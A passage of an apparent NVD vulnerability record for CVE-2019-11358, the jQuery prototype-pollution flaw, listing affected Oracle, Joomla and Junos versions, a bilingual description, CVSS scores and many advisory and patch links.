"cpe:2.3:a:oracle:jdeveloper_and_adf:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "2233F287-6B9F-4C8A-A724-959DD3AD29AF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper_and_adf:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "2381FAB6-8D36-4389-98E4-74F3462654BA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:knowledge:*:*:*:*:*:*:*:*", matchCriteriaId: "9E587602-BA7D-4087-BE29-ACE0B01BD590", versionEndIncluding: "8.6.3", versionStartIncluding: "8.6.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.55:*:*:*:*:*:*:*", matchCriteriaId: "45CB30A1-B2C9-4BF5-B510-1F2F18B60C64", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:*", matchCriteriaId: "D0A735B4-4F3C-416B-8C08-9CB21BAD2889", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:*", matchCriteriaId: "7E1E416B-920B-49A0-9523-382898C2979D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:*", matchCriteriaId: "D9DB4A14-2EF5-4B54-95D2-75E6CF9AA0A9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:*:*:*:*:*:*:*:*", matchCriteriaId: "84668F58-6511-4E53-8213-13B440F454C1", versionEndIncluding: "12.2.15", versionStartIncluding: "12.2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:10.4.7:*:*:*:*:*:*:*", matchCriteriaId: "9D8B3B57-73D6-4402-987F-8AE723D52F94", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.1.0:*:*:*:*:*:*:*", matchCriteriaId: "62BF043E-BCB9-433D-BA09-7357853EE127", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.1.1:*:*:*:*:*:*:*", matchCriteriaId: "3F26FB80-F541-4B59-AC3C-633F49388B59", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_connector_for_siebel:10.4.6:*:*:*:*:*:*:*", matchCriteriaId: "0DB5E2C7-9C68-4D3B-95AD-9CBF65DE1E94", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:*:*:*:*:*:*:*:*", matchCriteriaId: "12D3B2F0-E9C7-432B-91C6-A6C329A84B78", versionEndIncluding: "12.2.15", versionStartIncluding: "12.2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", matchCriteriaId: "06CF27F6-ADC1-480C-9D2E-2BD1E7330C32", versionEndIncluding: "16.2.11", versionStartIncluding: "16.2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", matchCriteriaId: "E4AA3854-C9FD-4287-85A0-EE7907D1E1ED", versionEndIncluding: "17.12.7", versionStartIncluding: "17.12.0", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", matchCriteriaId: "E8CD4002-F310-4BE4-AF7B-4BCCB17DA6FF", versionEndIncluding: "18.8.9", versionStartIncluding: "18.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", matchCriteriaId: "69112C56-7747-4E11-A938-85A481529F58", versionEndIncluding: "19.12.4", versionStartIncluding: "19.12.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:15.2.18:*:*:*:*:*:*:*", matchCriteriaId: "D9E628E7-6CC5-418C-939F-8EEA69B222A0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*", matchCriteriaId: "08FA59A8-6A62-4B33-8952-D6E658F8DAC9", versionEndIncluding: "17.12", versionStartIncluding: "17.7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*", matchCriteriaId: "D55A54FD-7DD1-49CD-BE81-0BE73990943C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*", matchCriteriaId: "82EB08C0-2D46-4635-88DF-E54F6452D3A3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", matchCriteriaId: "202AD518-2E9B-4062-B063-9858AE1F9CE2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:real-time_scheduler:*:*:*:*:*:*:*:*", matchCriteriaId: "99579D88-27C0-4B93-B2F4-69B6781BC4BD", versionEndIncluding: "2.3.0.3", versionStartIncluding: "2.3.0.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:rest_data_services:11.2.0.4:*:*:*:-:*:*:*", matchCriteriaId: "36FC547E-861A-418C-A314-DA09A457B13A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:rest_data_services:12.1.0.2:*:*:*:-:*:*:*", matchCriteriaId: "DF9FEE51-50E3-41E9-AA0D-272A640F85CC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:rest_data_services:12.2.0.1:*:*:*:-:*:*:*", matchCriteriaId: "E69E905F-2E1A-4462-9082-FF7B10474496", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:rest_data_services:18c:*:*:*:-:*:*:*", matchCriteriaId: "0F9B692C-8986-4F91-9EF4-2BB1E3B5C133", 
vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:rest_data_services:19c:*:*:*:-:*:*:*", matchCriteriaId: "C5F4C40E-3ABC-4C59-B226-224262DCFF37", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_back_office:14.0:*:*:*:*:*:*:*", matchCriteriaId: "31C7EEA3-AA72-48DA-A112-2923DBB37773", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_back_office:14.1:*:*:*:*:*:*:*", matchCriteriaId: "F0735989-13BD-40B3-B954-AC0529C5B53D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_central_office:14.0:*:*:*:*:*:*:*", matchCriteriaId: "83B5F416-56AE-4DC5-BCFF-49702463E716", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_central_office:14.1:*:*:*:*:*:*:*", matchCriteriaId: "58405263-E84C-4071-BB23-165D49034A00", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_insights:15.0:*:*:*:*:*:*:*", matchCriteriaId: "AD4AB77A-E829-4603-AF6A-97B9CD0D687F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_insights:16.0:*:*:*:*:*:*:*", matchCriteriaId: "6DE15D64-6F49-4F43-8079-0C7827384C86", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:18.0:*:*:*:*:*:*:*", matchCriteriaId: "36E16AEF-ACEB-413C-888C-8D250F65C180", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:19.0:*:*:*:*:*:*:*", matchCriteriaId: "9EFAEA84-E376-40A2-8C9F-3E0676FEC527", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_point-of-service:14.0:*:*:*:*:*:*:*", matchCriteriaId: "237968A4-AE89-44DC-8BA3-D9651F88883D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_point-of-service:14.1:*:*:*:*:*:*:*", matchCriteriaId: "E13DF2AE-F315-4085-9172-6C8B21AF1C9E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_returns_management:14.0:*:*:*:*:*:*:*", matchCriteriaId: "959316A8-C3AF-4126-A242-3835ED0AD1E8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_returns_management:14.1:*:*:*:*:*:*:*", matchCriteriaId: 
"BDB925C6-2CBC-4D88-B9EA-F246F4F7A206", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:service_bus:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "1E2B6C75-3EB5-4BCE-B5D1-39DD3DE94139", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:service_bus:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "70BEF219-45EC-4A53-A815-42FBE20FC300", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:service_bus:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "1EA2023A-1AD6-41FE-A214-9D1F6021D6B6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:siebel_mobile_applications:*:*:*:*:*:*:*:*", matchCriteriaId: "2AA4E307-D5FA-461D-9809-BDD123AE7B74", versionEndIncluding: "19.8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:siebel_ui_framework:20.8:*:*:*:*:*:*:*", matchCriteriaId: "98B9198C-11DF-4E80-ACFC-DC719CED8C7E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:storagetek_tape_analytics_sw_tool:2.3.0:*:*:*:*:*:*:*", matchCriteriaId: "587EE4F3-E7AC-4A69-9476-0E71E75EE7A4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:system_utilities:19.1:*:*:*:*:*:*:*", matchCriteriaId: "A7961BBD-6411-4D32-947D-3940221C235B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:tape_library_acsls:8.5:*:*:*:*:*:*:*", matchCriteriaId: "162C6FD9-AEC2-4EBA-A163-3054840B8ACE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:tape_library_acsls:8.5.1:*:*:*:*:*:*:*", matchCriteriaId: "A6879D52-A44E-4DF8-8A3A-3613822EB469", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:transportation_management:1.4.3:*:*:*:*:*:*:*", matchCriteriaId: "5AAF89C1-AAC2-449C-90C1-895F5F8843B4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_mobile_workforce_management:*:*:*:*:*:*:*:*", matchCriteriaId: "2F2D3FA0-BD9D-4828-AE36-1CE43D9B07D1", versionEndIncluding: "2.3.0.3", versionStartIncluding: "2.3.0.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "D551CAB1-4312-44AA-BDA8-A030817E153A", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B40B13B7-68B3-4510-968C-6A730EB46462", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "C93CC705-1F8C-4870-99E6-14BF264C3811", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "F14A818F-AA16-4438-A3E4-E64C9287AC66", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "04BCDC24-4A21-473C-8733-0D9CFB38A752", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:joomla:joomla\\!:*:*:*:*:*:*:*:*", matchCriteriaId: "C63557DE-E65B-46F4-99C4-247EACCB7BBA", versionEndIncluding: "3.9.4", versionStartIncluding: "3.0.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:juniper:junos:21.2:-:*:*:*:*:*:*", matchCriteriaId: "216E7DDE-453D-481F-92E2-9F8466CDDA3F", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype.", }, { lang: "es", value: "jQuery, en versiones anteriores a 3.4.0, como es usado en Drupal, Backdrop CMS, y otros productos, maneja mal jQuery.extend(true, {}, ...) debido a la contaminación de Object.prototype. 
Si un objeto fuente no sanitizado contenía una propiedad enumerable __proto__, podría extender el Object.prototype nativo.", }, ], id: "CVE-2019-11358", lastModified: "2024-11-21T04:20:56.320", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "NONE", baseScore: 4.3, confidentialityImpact: "NONE", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N", version: "2.0", }, exploitabilityScore: 8.6, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: true, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, exploitabilityScore: 2.8, impactScore: 2.7, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2019-04-20T00:29:00.247", references: [ { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00006.html", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00025.html", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", "VDB Entry", ], url: 
"http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "http://seclists.org/fulldisclosure/2019/May/10", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Patch", "Third Party Advisory", ], url: "http://seclists.org/fulldisclosure/2019/May/11", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Patch", "Third Party Advisory", ], url: "http://seclists.org/fulldisclosure/2019/May/13", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Patch", "Third Party Advisory", ], url: "http://www.openwall.com/lists/oss-security/2019/06/03/2", }, { source: "cve@mitre.org", tags: [ "Broken Link", "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/108023", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHBA-2019:1570", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1456", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:2587", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3023", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3024", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://backdropcms.org/security/backdrop-sa-core-2019-009", }, { source: "cve@mitre.org", tags: [ "Release Notes", "Vendor Advisory", ], url: "https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/pull/4333", }, { source: 
"cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/08720ef215ee7ab3386c05a1a90a7d1c852bf0706f176a7816bf65fc%40%3Ccommits.airflow.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/5928aa293e39d248266472210c50f176cac1535220f2486e6a7fa844%40%3Ccommits.airflow.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/6097cdbd6f0a337bedd9bb5cc441b2d525ff002a96531de367e4259f%40%3Ccommits.airflow.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/88fb0362fd40e5b605ea8149f63241537b8b6fb5bfa315391fc5cbb7%40%3Ccommits.airflow.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/b736d0784cf02f5a30fbb4c5902762a15ad6d47e17e2c5a17b7d6205%40%3Ccommits.airflow.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6%40%3Ccommits.roller.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3%40%3Ccommits.nifi.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: 
"https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r2041a75d3fc09dec55adfd95d598b38d22715303f65c997c054844c9%40%3Cissues.flink.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r2baacab6e0acb5a2092eb46ae04fd6c3e8277b4fd79b1ffb7f3254fa%40%3Cissues.flink.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r38f0d1aa3c923c22977fe7376508f030f22e22c1379fbb155bf29766%40%3Cdev.syncope.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r41b5bfe009c845f67d4f68948cc9419ac2d62e287804aafd72892b08%40%3Cissues.flink.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r7aac081cbddb6baa24b75e74abf0929bf309b176755a53e3ed810355%40%3Cdev.flink.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r7d64895cc4dff84d0becfc572b20c0e4bf9bfa7b10c6f5f73e783734%40%3Cdev.storm.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r7e8ebccb7c022e41295f6fdb7b971209b83702339f872ddd8cf8bf73%40%3Cissues.flink.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/rac25da84ecdcd36f6de5ad0d255f4e967209bbbebddb285e231da37d%40%3Cissues.flink.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b%40%3Ccommits.nifi.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: 
"https://lists.debian.org/debian-lts-announce/2019/05/msg00006.html", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2019/05/msg00029.html", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2020/02/msg00024.html", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA/", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5IABSKTYZ5JUGL735UKGXL5YPRYOPUYI/", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KYH3OAGR2RTCHRA5NOKX2TES7SNQMWGO/", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QV3PKZC3PQCO3273HAT76PAQZFBEO4KP/", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RLXRX23725JL366CNZGJZ7AQQB7LHQ6F/", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZW27UCJ5CYFL4KFFFMYMIBNMIU2ALG5/", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/Apr/32", }, { 
source: "cve@mitre.org", tags: [ "Issue Tracking", "Mailing List", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/Jun/12", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Patch", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/May/18", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20190919-0001/", }, { source: "cve@mitre.org", tags: [ "Exploit", "Third Party Advisory", ], url: "https://snyk.io/vuln/SNYK-JS-JQUERY-174006", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://supportportal.juniper.net/s/article/2021-07-Security-Bulletin-Junos-OS-Multiple-J-Web-vulnerabilities-resolved-in-Junos-OS-21-2R1", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2019/dsa-4434", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2019/dsa-4460", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.drupal.org/sa-core-2019-006", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party 
Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.privacy-wise.com/mitigating-cve-2019-11358-in-old-versions-of-jquery/", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.synology.com/security/advisory/Synology_SA_19_19", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.tenable.com/security/tns-2019-08", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.tenable.com/security/tns-2020-02", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00006.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00025.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html", }, { source: 
"af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "http://seclists.org/fulldisclosure/2019/May/10", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Patch", "Third Party Advisory", ], url: "http://seclists.org/fulldisclosure/2019/May/11", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Patch", "Third Party Advisory", ], url: "http://seclists.org/fulldisclosure/2019/May/13", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Patch", "Third Party Advisory", ], url: "http://www.openwall.com/lists/oss-security/2019/06/03/2", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Broken Link", "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/108023", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHBA-2019:1570", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1456", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:2587", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3023", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3024", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://backdropcms.org/security/backdrop-sa-core-2019-009", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Release Notes", "Vendor Advisory", ], url: 
"https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/pull/4333", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/08720ef215ee7ab3386c05a1a90a7d1c852bf0706f176a7816bf65fc%40%3Ccommits.airflow.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: 